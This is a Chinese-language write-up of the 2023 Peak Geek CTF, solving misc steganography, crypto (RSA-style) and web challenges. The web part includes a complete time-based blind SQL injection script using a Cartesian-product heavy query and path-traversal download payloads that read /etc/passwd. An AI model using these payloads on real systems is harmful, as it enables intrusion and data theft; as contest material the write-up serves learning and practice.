巅峰极客 2023 Writeup

2023年07月22日技术约 1.3k 字大概 6 分钟

Misc

welcome

极客荟萃，逐梦巅峰！欢迎大家参加中国电信·2023“巅峰极客”网络安全技能挑战赛。
本场比赛空调已开放.jpg，请各位选手提交flag凭证有序进入。
flag凭证如下：
ZmxhZ3tQZWVrZ2Vla18xc19BX0dyM2E3X2VWZW43X2Ywcl9ldjNyeV9DVEZlcn0=

直接 Base64 解码

1	`flag{Peekgeek_1s_A_Gr3a7_eVen7_f0r_ev3ry_CTFer}`

foundme

I made an image that I really liked with my favorite flag, but the computer accidentally shut down, but fortunately I saved the dump file.

直接 010 打开检索 flag 得到一段提示

1	`It's just a dump file, and you've found a new lead Maybe you know the Netflix picture format? Hope this hint helps you. Search for more information to find the flag!`

同时发现一个文件 FFFFFFLAG.AVIF

直接百度找了一个图片在线转 AVIF 的网站，然后查看文件头为一下内容(第四位不固定，所以我们直接搜后四位)

1	`00 00 00 xx 66 74 79 70`

找到了文件头但是找不到文件尾，直接不管那么多，随缘复制然后导出为 avif 即可，照片查看器有容错机制

song

网易云，上号！

直接 010 搜索附件找到 flag.txt文件，但是 binwalk 分离不出压缩包

后来直接开头前五位改写为 50 4b 03 04 14 同时后缀改为 zip 正常打开了，解压后全局搜索 flag 发现 docProps\app.xml 里面提示 Flag in Netease cloud

同时在 docProps\thumbnail.jpe 分离出一个压缩包

1	`Please do not try to burst the password!!!!!!!!`

同时在 password_hint.txt 得到一串编码

1	9iZ!r@n(9KAQV])<,6_K:,$L-<`N0U>'`J\@;A:f@X:pc;__<N;f->);/8c[<(K>S=u&Q<<C\oJA2-DK9l+cpAQMnd;/LD5=&s-8@T?rP;cdd':,$@!;_g1U<ARX#;)<$*;/J0E@P^bo;f-JGAQ3=t:/tFO@r$$s9gs:q@kgl'<`Lh:

直接 CyberChef 梭掉，另外最后需要选择一下编码为 UFT-8 否则乱码

然后在 ppt/media 目录发现一个大小异常的图片 image4.png

其中 image4.png 和 image5.png 图片除文件大小为，其他一模一样(内容和宽高)，通过 010 观察两个文件发现 image4.png 是在 image5.png 的基础上插入了大量的内容，通过比对文件尾发现插入其他内容的 hex 如下所示

1	`C7FF038FBFE300A4F7141C<插入的内容>0000000049454E44AE426082`

直接编写代码取出插入的部分，然后转换为文件

import binascii

with open('image4.png', 'rb') as f:
    hex_data = binascii.hexlify(f.read()).decode().upper()

start_idx = hex_data.find('C7FF038FBFE300A4F7141C')
end_idx = hex_data.find('0000000049454E44AE426082')

data = binascii.unhexlify(hex_data[start_idx + 22:end_idx])

with open('output', 'wb') as f:
    f.write(data)

直接通过 file 命令分析一波

1
2
3

┌──(kali㉿kali)-[~/Desktop]
└─$ file output
output: Monkey's Audio compressed format version 3990 with high compression, stereo, sample rate 44100

百度检索 Monkey's Audio 发现文件后缀格式应该为 .ape 且是一个音频文件，我们直接后缀改为 .ape

1	`Monkey's Audio是一种无损压缩技术的软件，常被用来解压缩APE格式的无损音乐文件，APE是流行的数字音乐文件格式之一。`

直接使用 Deepsound 进行解密(这隐写软件只在 VishwaCTF 2023 里面用过，幸好隔得时间不长没忘记)，直接导入文件，提示输入密码

结合 password_hint.txt 得到的信息直接弱密码 123456 解密成功

得到的 password.txt 文件内容为 Ook 编码，直接解码后得到密码

1	`this_zip_password_is_QazWsx147!@#`

最终解压我们最初分离出的文件得到 flag

1	`flag{lW9tUyrh8RzzvysrswAwY7MHR4mmbLSt}`

Web

hellosql

笛卡尔积，导致时间盲注

import requests
import time

url = "http://web-2f7d23ba90.challenge.xctf.org.cn/index.php?id="
flag = ""

def str2hex(str):
    hex1='0x'
    for i in str:
        hex1+=hex(ord(i))[2:]
    return hex1
result=''
for i in range(1,100) :
    time.sleep(0.1)
    low = 32
    high = 127
    mid = (low + high) // 2

    while (low < high):

        payload = "' OR CASE WHEN ASCII(SUBSTR((SELECT(group_concat(Flagg))from(ctf.Flllag)),{},1))>{} THEN (SELECT MAX(A.TABLE_NAME) FROM information_schema.columns A, information_schema.columns B) END#".format(i, mid)

        start_time = time.time()
        r = requests.get(url=url,params={
            "id":payload
        },)
        end_time = time.time()
        print(end_time-start_time)
        if (end_time - start_time) >= 0.5:
            low = mid + 1

        else:
            high = mid
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    print(i)
    flag += chr(mid)
    print(flag)

hinder

路由为/hinder

我们尝试双写 // 得到一个 hint

经过测试发现存在任意文件下载，但是经过 FUZZ 以及读取环境变量等操作，并未发现 flag

1	`//hinder/download.action?filename=../../../../../../../../../../../../etc/passwd`

最终通过读取未删除的 /run.sh 文件得到 flag 存在于 oh_u_f1nd_me 文件中

#!/bin/sh

#echo $FLAG > /oh_u_f1nd_me
FLAG=not_here
export FLAG=not_here
/usr/local/tomcat/bin/catalina.sh run

1	`//hinder/download.action?filename=../../../../../../../../../../../../oh_u_f1nd_me`

Crypto

数学但高中

来感受一下画图的乐趣，没有字母’o’

在 desmos 中输入附件给出的函数即可

1	`flag{Funct10n_Fun}`

Simple_encryption

一起学数学

第一段：原题 [V&N2020 公开赛]Fast

第二段：一元copper

import gmpy2
import binascii
from sympy import Symbol, solve
from Crypto.Util.number import long_to_bytes

c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
g2=14068322834597276347776814624877614869834816383564391664570268934537693322688875343215293618493363798985047779057952636529313879548457643220996398640913517182122425631198219387988691569709691279442005545716133131472147592456812502863851227108284027033557263611949365667779259585770738623603814004666845554284808166195201470503432803440754207350347128045893594280079379926676477680556845095378093693409219131090910168117334308781843178748431526974047817218228075136005979538773141427004682344298827618677773735288946271346252828348742296301538573408254015281232250841148556304927266143397565889649305095857756884049430

def decrypt(c1, c2):
    xp = c1 % p
    xq = c2 % q
    m = (xp*gmpy2.invert(q, p)*q + xq*gmpy2.invert(p, q)*p) % N
    return m

p = gmpy2.gcd(g1-1,N)
q = gmpy2.gcd(g2-1,N)
m = decrypt(c1,c2)
flag1 = binascii.unhexlify(hex(m)[2:]).decode('utf-8')

S= 234626762558445335519229319778735528295
N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
e= 5
Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]

flag2 = ''
for i in range(2):
    m1 = gmpy2.iroot(Cs[i], e)[0]
    s = Symbol('s')
    eq = (i + 128) ** 2 * s ** 2 + (i + 1024) * s + (i + 512) - m1
    result = list(solve(eq, s))
    flag2 += long_to_bytes(result[1]).decode('utf-8')

print(flag1 + flag2)
# flag{f561fafb-32ce-9d16-18fa-ec795fc1d208}